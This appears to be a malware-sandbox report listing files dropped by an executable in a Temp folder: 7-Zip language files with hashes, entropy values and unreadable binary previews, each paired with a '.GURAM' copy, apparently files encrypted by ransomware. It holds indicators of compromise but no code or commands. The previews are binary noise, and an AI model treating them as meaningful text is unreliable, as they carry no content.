                                                                                                                                                                                                                                                Preview:5.A(R,.u.H...0..7!..B.S.......B....L>...(..~...i..h%..i.....=.h.bu.x......j-.......e..,...nB5.^.\.d......H......p..(..E..*S......JX.7ia..<M.<....r.u#rT'+.fr.....{..T..._A.K,...=....U.I.hL$^...du.C.vK.L./,]..5..`Q#:.F@.n..c.....r.op.....o.1\.s.\..S.G...[8...... ..'.0E.O9....a.....a......caa...}%X.m....+......,kS..].O.......`C.t.O.V..HBH.S.}I...Eg.)...C.!LY.P...L..{^..%.1...u..u2xhX....7..Ly..-.x...^2.;.Q.iM...p&.v..'.)!,.#Hm2..).~.^@..M...]..)...u.AO..M..!.....i!`L..!E.`..~Sm..?V..#.z...N.n.od..gCp.%....d..c.jfgW..!(...E;.b@....'.....g.y.q.{..`....8.|T.....;!..97..#........k.Oy.. ...A.1s.../...y....4.-.....%.cBj....,..zqs..@s./. ..U..q..H8..M../.....HGOm..gK...w.bL..CCvj!(.I~....L.#'C.....L.G.....3.\VqC..$......`.ad\r..r.._.c]..LE.'...\.n......&.G.%.~^~..^......#.N_@A.E..M.'....E..z....{2\=.......p.z....z....b7f\...X..<..S(..7l...9..$[.....e&.P).S..):...E.....Y..,...~$lM.f.U@V.."._d}...#.~..k.....C.h$.N..O!!4.....+s......p._..J....1..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\be.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):12469
                                                                                                                                                                                                                                                Entropy (8bit):7.986397781171668
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:KVS7qIWTxDXF+0r857MnnErpXsdMw4cM0THXamy:ixDXjnEZuMfcHTHXamy
                                                                                                                                                                                                                                                MD5:1FD35B3EC73D3D3A9567C3CADA89D0E2
                                                                                                                                                                                                                                                SHA1:D868A7802F57A2892BA62A497606EE7F6CE2FF7F
                                                                                                                                                                                                                                                SHA-256:CF6F71C273B0F70E8A30AC24E50643AF701F37C061F33B29F33BDA543BC4E63D
                                                                                                                                                                                                                                                SHA-512:DB7F7CC01967E3A2DB240E417F3C57C98090A63FABDCDCDDD02A2CFDE3C862031D26D6A45FF83DB931C6BE5908C8362315A79C8A8053DEB3ABD0E927DD405B01
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.T^.?V...s..[@.L..[>...L.I.K.@.y..f...c.N>@0......{t.Oo.. ...gG+;<t.=..H.....'..N|.EzH..".*...q..\.Q...1..8.`AN.<.H.K?x.8z`..'.^3m..=..&.Z{..o..W...!..H|. %]2)(u..9.=^.....A_..-.J..A..l..t..]..n.v....H..G=..8.;W......'.h..A.....;.....].V...:...w.fq...,`..../y@Wlwqy....ZU.+1.H_a...7.......b3;...I-N.`..?....p...w...9.LI...#?.c..vA.*.~......*.m\...T...X.....x....MD...~...n=G`.|....I."Y...[.2..n...X.P.|...R.. 9.....Dt.`..I.e...I(.-.G.1:w.F_.F..&^..G.;..P..Hg...'..nh..h.E.........I.."L$.........Q...8\....&..M.E .Z..u}.*..5....l...+>.3..(.4...^.1.[...EV..w..H....hu5...0+.=g..o>..H......Ie.W.c,%M, ....o...C."...'Od.<..T......*.T..L.V.../5...5.....n..F~".G....5.d.Z.."v..-.n..Jo.W0g..QRIX.....NK....62...N..../..c.n....h.37..lr..P.....\........t.h.......4,...Lf..&r..Y."..f.....g..v.0.....i.].T.{..3..E.X...-.u@..].AZ.......QJ.L.'u.._.....[.2.....(<!.T ..q...cF..D-mh.7u.?..K.?avD.B.U....~.."^v.31j.i}....q..j.&.......w..9S...y.....>>

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\be.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):12469
                                                                                                                                                                                                                                                Entropy (8bit):7.986397781171668
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:KVS7qIWTxDXF+0r857MnnErpXsdMw4cM0THXamy:ixDXjnEZuMfcHTHXamy
                                                                                                                                                                                                                                                MD5:1FD35B3EC73D3D3A9567C3CADA89D0E2
                                                                                                                                                                                                                                                SHA1:D868A7802F57A2892BA62A497606EE7F6CE2FF7F
                                                                                                                                                                                                                                                SHA-256:CF6F71C273B0F70E8A30AC24E50643AF701F37C061F33B29F33BDA543BC4E63D
                                                                                                                                                                                                                                                SHA-512:DB7F7CC01967E3A2DB240E417F3C57C98090A63FABDCDCDDD02A2CFDE3C862031D26D6A45FF83DB931C6BE5908C8362315A79C8A8053DEB3ABD0E927DD405B01
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.T^.?V...s..[@.L..[>...L.I.K.@.y..f...c.N>@0......{t.Oo.. ...gG+;<t.=..H.....'..N|.EzH..".*...q..\.Q...1..8.`AN.<.H.K?x.8z`..'.^3m..=..&.Z{..o..W...!..H|. %]2)(u..9.=^.....A_..-.J..A..l..t..]..n.v....H..G=..8.;W......'.h..A.....;.....].V...:...w.fq...,`..../y@Wlwqy....ZU.+1.H_a...7.......b3;...I-N.`..?....p...w...9.LI...#?.c..vA.*.~......*.m\...T...X.....x....MD...~...n=G`.|....I."Y...[.2..n...X.P.|...R.. 9.....Dt.`..I.e...I(.-.G.1:w.F_.F..&^..G.;..P..Hg...'..nh..h.E.........I.."L$.........Q...8\....&..M.E .Z..u}.*..5....l...+>.3..(.4...^.1.[...EV..w..H....hu5...0+.=g..o>..H......Ie.W.c,%M, ....o...C."...'Od.<..T......*.T..L.V.../5...5.....n..F~".G....5.d.Z.."v..-.n..Jo.W0g..QRIX.....NK....62...N..../..c.n....h.37..lr..P.....\........t.h.......4,...Lf..&r..Y."..f.....g..v.0.....i.].T.{..3..E.X...-.u@..].AZ.......QJ.L.'u.._.....[.2.....(<!.T ..q...cF..D-mh.7u.?..K.?avD.B.U....~.."^v.31j.i}....q..j.&.......w..9S...y.....>>

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\bg.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):13704
                                                                                                                                                                                                                                                Entropy (8bit):7.987289708221403
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:uX9Y1/RZ9/sBVmbV4amdamIeUhb07Odayn+1qA:2u1/rVsAM7uaymqA
                                                                                                                                                                                                                                                MD5:BC964EF6F90AFC2654BCF59597234ACF
                                                                                                                                                                                                                                                SHA1:79D1AE0BB960C5B6505E1AE33EC541868AC83BB3
                                                                                                                                                                                                                                                SHA-256:0F8E5FC5C9346DF5B84B4955A56EC2ACB84845783A749191D465E640D37A9D05
                                                                                                                                                                                                                                                SHA-512:8FF22FA2DF29E758409F3B1936AD73C8545F5CFEADFFCB15EA2747F8291E40AB6EBBF1D7E744A0509E86EBC7F67C5AC7541DB01A98E4FCE993690CB9A555D4C4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:."B..G.9.-.....n...~....r....ZeXF...%.j.j~+f....L..~%.......~D%..4.u..x.WQ.:.(i.r.e...D.P3.}Z5=5.(..0t....!.....g.x..6.g...\.....6.~1.H..GD..h..`.Y.}qV{._N.:....>G.%B...V.O..M.lp.Y....A..R....q.qU....B{.).........y.*.k6..&.o$..S;...r.D...}E..`.lI..d....?{......n5'`.j..]b.Ot.....Y.....UF./...>.O.8.[|.y..i.GZ.c...H*......2.z.K..d'p..]..[Q.FI..Q...6\.s....3n........."o.&2j.`W...&:..J..R.l}.j....hO)...m0^....C.7yy.S.3$W*....*....F$.../y..M.....)c.g8..aQ.....ohA.*.'.V`...*...._.;a...4..>.'.X.L..#4.=n.lwb.-.n...j....@....p.3..y...W.")...".gr.?.9.].x..G:G.i{*..c...d.p ...1#..w..(..|..0.........Q..C..tZ5x....Z...,.R.* ..y.S.s....n..)omz...g..H.W..&.O.s..a..N*...m.`t..[.S....'..m..45.]I.......n......cW.1[..\6..j...P. .V.Q....N..[q..%v.hJ.!.:a+]......4.s.s....-.z..-^.......%...g.2...wq...3..,I-.".).....r......M....9..b......^...F=.....#.d...N...<<E%f...~C..>.'..d...v.....?.-4..Z..@&....K..Fx...P'..!......R.P2|...8.3.).O...M......6.m.8!%....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\bg.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):13704
                                                                                                                                                                                                                                                Entropy (8bit):7.987289708221403
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:uX9Y1/RZ9/sBVmbV4amdamIeUhb07Odayn+1qA:2u1/rVsAM7uaymqA
                                                                                                                                                                                                                                                MD5:BC964EF6F90AFC2654BCF59597234ACF
                                                                                                                                                                                                                                                SHA1:79D1AE0BB960C5B6505E1AE33EC541868AC83BB3
                                                                                                                                                                                                                                                SHA-256:0F8E5FC5C9346DF5B84B4955A56EC2ACB84845783A749191D465E640D37A9D05
                                                                                                                                                                                                                                                SHA-512:8FF22FA2DF29E758409F3B1936AD73C8545F5CFEADFFCB15EA2747F8291E40AB6EBBF1D7E744A0509E86EBC7F67C5AC7541DB01A98E4FCE993690CB9A555D4C4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:."B..G.9.-.....n...~....r....ZeXF...%.j.j~+f....L..~%.......~D%..4.u..x.WQ.:.(i.r.e...D.P3.}Z5=5.(..0t....!.....g.x..6.g...\.....6.~1.H..GD..h..`.Y.}qV{._N.:....>G.%B...V.O..M.lp.Y....A..R....q.qU....B{.).........y.*.k6..&.o$..S;...r.D...}E..`.lI..d....?{......n5'`.j..]b.Ot.....Y.....UF./...>.O.8.[|.y..i.GZ.c...H*......2.z.K..d'p..]..[Q.FI..Q...6\.s....3n........."o.&2j.`W...&:..J..R.l}.j....hO)...m0^....C.7yy.S.3$W*....*....F$.../y..M.....)c.g8..aQ.....ohA.*.'.V`...*...._.;a...4..>.'.X.L..#4.=n.lwb.-.n...j....@....p.3..y...W.")...".gr.?.9.].x..G:G.i{*..c...d.p ...1#..w..(..|..0.........Q..C..tZ5x....Z...,.R.* ..y.S.s....n..)omz...g..H.W..&.O.s..a..N*...m.`t..[.S....'..m..45.]I.......n......cW.1[..\6..j...P. .V.Q....N..[q..%v.hJ.!.:a+]......4.s.s....-.z..-^.......%...g.2...wq...3..,I-.".).....r......M....9..b......^...F=.....#.d...N...<<E%f...~C..>.'..d...v.....?.-4..Z..@&....K..Fx...P'..!......R.P2|...8.3.).O...M......6.m.8!%....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\bn.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):15645
                                                                                                                                                                                                                                                Entropy (8bit):7.989484081589195
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:yGu+mf52ZjfARV5Z1HCkKPA/Dh6BPkujU/Pt3pRnSAzYX3bmL8sx7St136VkhwgX:yGhRZjA37qVkua/n5+36LxSt1vhwT4
                                                                                                                                                                                                                                                MD5:44A1CD51C61EAD46573C7261AE94DBD3
                                                                                                                                                                                                                                                SHA1:6CC9C0D076CD261EF0C593A341177B65DD47D033
                                                                                                                                                                                                                                                SHA-256:314F24E360491F785B24CB9FF71A07E17C2B98D2495D613C69006092DFEC2DCA
                                                                                                                                                                                                                                                SHA-512:2F8213049C7AA2D492CD71797A24108B16A8AF102DA5BB6FE07F2B565262E4FA19B5CA402EA0E8AE0A9A8917E245BF826E3DF3EE50DA51FDC75876ECE9F1F2EB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:<.K.f.T"Y'........^..@.......?*.E}/[..l.......q"..t.<.BPPG..2.l.....8t.....o*....j0.5...#... ...M...C.Q...0..DU..Q~.J...g.'^....z....u=f.....<_Eg..W.....F.sf_.2..dk..uIH..PN...n.2f;E...s-.h.P.......m@.....m0.Tg.....Q.E..1...UC+......3h'.s...r...G..z.$.>$...J.k.6.W.r..1.Q.}...,..#.S.<.d..*4..y..6..v'.J.\.=....k.y..y=.qT.u.......h.V......+.IX...."...w|7..9M.....A....`.yIU..!..AM5.....eN..8..H.I.u...:........F..M......t~@Y.b:....>........h...r;..S",...........j....0....y.8..Y....~.W.....].k_..+....aQ...-...os.g.5u."V.....{z...:.S...d.....mP}.aW.U.G+..{...u.C...S..UP.f.6.....~Vj.}.6.gl.8yo...P..M._d....Z.Y...*..!...".....Iw.W...~../.}Mdy.......{Z...T. .SN...R...Zd..?.......6..g.N.J..z...k.....m}..f...o.n`...8Hf...Q..........WT..4......X=....w....J.<G...|..K;k.....t.<.G......LJ..So.eq...Srxc.c..#T..._sG..A.|...[.....A.V..^h...m.u..Y.A..#.Q....... ..WI...9'........]...lc@..>...F.;.L..Z`n.....h...#Z...!M...;.....D...r....'/.....K.....~.gBFZ$(i.. .'<

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\bn.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):15645
                                                                                                                                                                                                                                                Entropy (8bit):7.989484081589195
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:yGu+mf52ZjfARV5Z1HCkKPA/Dh6BPkujU/Pt3pRnSAzYX3bmL8sx7St136VkhwgX:yGhRZjA37qVkua/n5+36LxSt1vhwT4
                                                                                                                                                                                                                                                MD5:44A1CD51C61EAD46573C7261AE94DBD3
                                                                                                                                                                                                                                                SHA1:6CC9C0D076CD261EF0C593A341177B65DD47D033
                                                                                                                                                                                                                                                SHA-256:314F24E360491F785B24CB9FF71A07E17C2B98D2495D613C69006092DFEC2DCA
                                                                                                                                                                                                                                                SHA-512:2F8213049C7AA2D492CD71797A24108B16A8AF102DA5BB6FE07F2B565262E4FA19B5CA402EA0E8AE0A9A8917E245BF826E3DF3EE50DA51FDC75876ECE9F1F2EB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:<.K.f.T"Y'........^..@.......?*.E}/[..l.......q"..t.<.BPPG..2.l.....8t.....o*....j0.5...#... ...M...C.Q...0..DU..Q~.J...g.'^....z....u=f.....<_Eg..W.....F.sf_.2..dk..uIH..PN...n.2f;E...s-.h.P.......m@.....m0.Tg.....Q.E..1...UC+......3h'.s...r...G..z.$.>$...J.k.6.W.r..1.Q.}...,..#.S.<.d..*4..y..6..v'.J.\.=....k.y..y=.qT.u.......h.V......+.IX...."...w|7..9M.....A....`.yIU..!..AM5.....eN..8..H.I.u...:........F..M......t~@Y.b:....>........h...r;..S",...........j....0....y.8..Y....~.W.....].k_..+....aQ...-...os.g.5u."V.....{z...:.S...d.....mP}.aW.U.G+..{...u.C...S..UP.f.6.....~Vj.}.6.gl.8yo...P..M._d....Z.Y...*..!...".....Iw.W...~../.}Mdy.......{Z...T. .SN...R...Zd..?.......6..g.N.J..z...k.....m}..f...o.n`...8Hf...Q..........WT..4......X=....w....J.<G...|..K;k.....t.<.G......LJ..So.eq...Srxc.c..#T..._sG..A.|...[.....A.V..^h...m.u..Y.A..#.Q....... ..WI...9'........]...lc@..>...F.;.L..Z`n.....h...#Z...!M...;.....D...r....'/.....K.....~.gBFZ$(i.. .'<

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\br.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5965
                                                                                                                                                                                                                                                Entropy (8bit):7.970708088764502
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:x78cUznz+TZQ/rRqpU9dfZ6hXXvuuuQ1Y/8F2HsIgDtkP1rV0pFmo/j3BPwle0:aNz+ejEpU9dchXXRl1Y/8F2D6WUpYo/C
                                                                                                                                                                                                                                                MD5:D6533EBB580B32BEA42AC09B21C45F3C
                                                                                                                                                                                                                                                SHA1:36EB6A7FE8993D0257E469640E2B9FA80A497A7C
                                                                                                                                                                                                                                                SHA-256:F87955AFB6A5FCB9ACEE4EE7FD00367D7BD8E258E83CDBD77A107AA7D25331CD
                                                                                                                                                                                                                                                SHA-512:9DA9859806F6DF234EFE971F7370A606CD8FB3E1305934AA24FD9A2E7227D6789282B609C3FB1C3827D4C8625AF57DD842CB5C5D100B6A5290C66A737A779EAD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..I./U{..- ..UV..\..'.....m..l..}....r.z..w.eb@.Q*...!X...P..."?@....<........B.7P....U...._.P.|.|..C.....{...."l(.#..?...:...e..6..!..u..c.jw..&..>.X@......o-+.T..J0..|..]7`.......|R(A6>.C.&.ZznwxI...w.S_.QI8..y.~YG.............'...].....y....q?d...Y>.Tty.`.6...>s..n.X.....=...S..qO.../UT&........3.I!5.2n..E....?...'...x.p..\.,..[ID..9..YU.U..D!V2.]..+x.H.k.J...&.?Wep2..y..w..+.....t. b-m....=.U...sz....g.......|K....._3.]/..um.u-.x..Pl..#.2.E.......).<...............X...v!.Bg..-y...Z0...+.r.....2.i....r.Rg.)&-..7.{=<r........ .i`.ERN.G....+I.@.@L...h.9O.V .h\.\. ......GhKD.......j...bU../.).[m`^..'.z...d....L.h....V...].d.cNE..D.i/.R.....&If_...G(._....F.F./...\&vZIC*u@...!s.o.a...h.J...W.p..N#.c;...!..+e.x....Z..qC_i.9.y.t.gc..:....q.....F....V:...S2...nR..=ld~..$....J=...........H9.<....+...u......:.+.CWu..w.E5G..#..)..A.J..Np!_6..!%..:..|.B.........."4.......`.6.,\U.OK..?....Ef.i.:y...J..bP@..eBJ`].>..|5.r.e.Ai.......=.......

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\br.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5965
                                                                                                                                                                                                                                                Entropy (8bit):7.970708088764502
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:x78cUznz+TZQ/rRqpU9dfZ6hXXvuuuQ1Y/8F2HsIgDtkP1rV0pFmo/j3BPwle0:aNz+ejEpU9dchXXRl1Y/8F2D6WUpYo/C
                                                                                                                                                                                                                                                MD5:D6533EBB580B32BEA42AC09B21C45F3C
                                                                                                                                                                                                                                                SHA1:36EB6A7FE8993D0257E469640E2B9FA80A497A7C
                                                                                                                                                                                                                                                SHA-256:F87955AFB6A5FCB9ACEE4EE7FD00367D7BD8E258E83CDBD77A107AA7D25331CD
                                                                                                                                                                                                                                                SHA-512:9DA9859806F6DF234EFE971F7370A606CD8FB3E1305934AA24FD9A2E7227D6789282B609C3FB1C3827D4C8625AF57DD842CB5C5D100B6A5290C66A737A779EAD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..I./U{..- ..UV..\..'.....m..l..}....r.z..w.eb@.Q*...!X...P..."?@....<........B.7P....U...._.P.|.|..C.....{...."l(.#..?...:...e..6..!..u..c.jw..&..>.X@......o-+.T..J0..|..]7`.......|R(A6>.C.&.ZznwxI...w.S_.QI8..y.~YG.............'...].....y....q?d...Y>.Tty.`.6...>s..n.X.....=...S..qO.../UT&........3.I!5.2n..E....?...'...x.p..\.,..[ID..9..YU.U..D!V2.]..+x.H.k.J...&.?Wep2..y..w..+.....t. b-m....=.U...sz....g.......|K....._3.]/..um.u-.x..Pl..#.2.E.......).<...............X...v!.Bg..-y...Z0...+.r.....2.i....r.Rg.)&-..7.{=<r........ .i`.ERN.G....+I.@.@L...h.9O.V .h\.\. ......GhKD.......j...bU../.).[m`^..'.z...d....L.h....V...].d.cNE..D.i/.R.....&If_...G(._....F.F./...\&vZIC*u@...!s.o.a...h.J...W.p..N#.c;...!..+e.x....Z..qC_i.9.y.t.gc..:....q.....F....V:...S2...nR..=ld~..$....J=...........H9.<....+...u......:.+.CWu..w.E5G..#..)..A.J..Np!_6..!%..:..|.B.........."4.......`.6.,\U.OK..?....Ef.i.:y...J..bP@..eBJ`].>..|5.r.e.Ai.......=.......

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ca.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9906
                                                                                                                                                                                                                                                Entropy (8bit):7.979476316421304
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:tKCBQPC4XinAwoxUG0UDX6RRd2zcH47Aqj7WngcOpkdcsF1hGEhBweUc:t5BQPeAwCUGNm/dGcH4sCCn2pkNFOEfd
                                                                                                                                                                                                                                                MD5:28FB726B57818B17AEC218CD6CA7947F
                                                                                                                                                                                                                                                SHA1:DE994CED5096D1B1141B14E36B1E153E945CE816
                                                                                                                                                                                                                                                SHA-256:FA471605C6550C9DEFFD9EA21AC74C5FF2062025AAB43FBEC1C579EC62BDBD14
                                                                                                                                                                                                                                                SHA-512:8FEDA8EB1677E487A2BB7BB9756316F872D009CBA57A78D1C2BB5EE94365D715503DD65BC81CE8B2C70DB1E68B235CE6EE0F1F27706C8CA5013A483392EAA832
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...0-.Xa......SW..Wk....{l....a.X.y..D...nb.&.l.5w.e..Cp.U.. ..ESh6...2.=\.......?.)A....s....^;.gG;..X.D..<.L.......).E2.)H9.c(......3B....M.....:.g[............jC1.!......<.....YQ.T..O..l.z.Vw..e"..........m!.,..\..}v\.@...................o...?......'..H..C........o......Ep..V...]..1...9.>Y.P.w.X.1.Wp..ie_.d...)!...S...e..z;.w...I.......J..@...'..s......._{"+>+...P..(.!3.|E.....q[h....O.:..O@p.^.$..2zC...i$Zr(G).s..l..l...]..5..b...Q.T..m:.......7h$.....@.B%=.T..s*..."...u....I..#.+...0....a....;:G.W..Pe...3@E.nN.....<.(j.,z...(....? c.%d....I2..e...H;.4...5.)Y['F....d...I.<...-.~^7.xFx.[..qJ6w^...[....7ua..rq...../v...{..".O....>?.k.0.x&6.._...;q.S.:.h.*..mp.6NW..4[!.W...{D..m..d. rjG...x..;x.\).........$.$*.5X[.LU..tIE......W....9....c..k@....4.9d.O5..'"..........-.-.!...v].I..e..*.'.,.....B.wXo....a...Hw...d....O..e.+..hI.p8....b.S....p.Ur.....O.6....?*.6P....~....'4LP..[...o......A...O.F...^...j.9!3.|..b.So.NYX.`2e..v.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ca.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9906
                                                                                                                                                                                                                                                Entropy (8bit):7.979476316421304
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:tKCBQPC4XinAwoxUG0UDX6RRd2zcH47Aqj7WngcOpkdcsF1hGEhBweUc:t5BQPeAwCUGNm/dGcH4sCCn2pkNFOEfd
                                                                                                                                                                                                                                                MD5:28FB726B57818B17AEC218CD6CA7947F
                                                                                                                                                                                                                                                SHA1:DE994CED5096D1B1141B14E36B1E153E945CE816
                                                                                                                                                                                                                                                SHA-256:FA471605C6550C9DEFFD9EA21AC74C5FF2062025AAB43FBEC1C579EC62BDBD14
                                                                                                                                                                                                                                                SHA-512:8FEDA8EB1677E487A2BB7BB9756316F872D009CBA57A78D1C2BB5EE94365D715503DD65BC81CE8B2C70DB1E68B235CE6EE0F1F27706C8CA5013A483392EAA832
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...0-.Xa......SW..Wk....{l....a.X.y..D...nb.&.l.5w.e..Cp.U.. ..ESh6...2.=\.......?.)A....s....^;.gG;..X.D..<.L.......).E2.)H9.c(......3B....M.....:.g[............jC1.!......<.....YQ.T..O..l.z.Vw..e"..........m!.,..\..}v\.@...................o...?......'..H..C........o......Ep..V...]..1...9.>Y.P.w.X.1.Wp..ie_.d...)!...S...e..z;.w...I.......J..@...'..s......._{"+>+...P..(.!3.|E.....q[h....O.:..O@p.^.$..2zC...i$Zr(G).s..l..l...]..5..b...Q.T..m:.......7h$.....@.B%=.T..s*..."...u....I..#.+...0....a....;:G.W..Pe...3@E.nN.....<.(j.,z...(....? c.%d....I2..e...H;.4...5.)Y['F....d...I.<...-.~^7.xFx.[..qJ6w^...[....7ua..rq...../v...{..".O....>?.k.0.x&6.._...;q.S.:.h.*..mp.6NW..4[!.W...{D..m..d. rjG...x..;x.\).........$.$*.5X[.LU..tIE......W....9....c..k@....4.9d.O5..'"..........-.-.!...v].I..e..*.'.,.....B.wXo....a...Hw...d....O..e.+..hI.p8....b.S....p.Ur.....O.6....?*.6P....~....'4LP..[...o......A...O.F...^...j.9!3.|..b.So.NYX.`2e..v.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\co.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11560
                                                                                                                                                                                                                                                Entropy (8bit):7.9849142394179315
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:D3ynWem5IGsxvzOun0pNRMC8divwVDmzwXqOKtCOSsQYN1jbocb6qtQITfZfWUR:CWoGsBaGC8iwXqOXcfZm89R
                                                                                                                                                                                                                                                MD5:F08D32B1CBF3373BF56DB7EC56800A4C
                                                                                                                                                                                                                                                SHA1:F1A62F2893C8F0E59F2F5A59D6B61D2DC2F82838
                                                                                                                                                                                                                                                SHA-256:49E259B5DCF40424EAF1E3E6BCBE6561DECCF1D0178591DD3EAADBA72E4D052C
                                                                                                                                                                                                                                                SHA-512:4D25ACE6FE3AAC99BA36C5B16F88644791B173E25813CEA1AE98D243D86CA987B7AF1EE114F0E0C35E23ADDA6E5C0AB012CECA0FC1F86B66115B837AD5F1F41B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
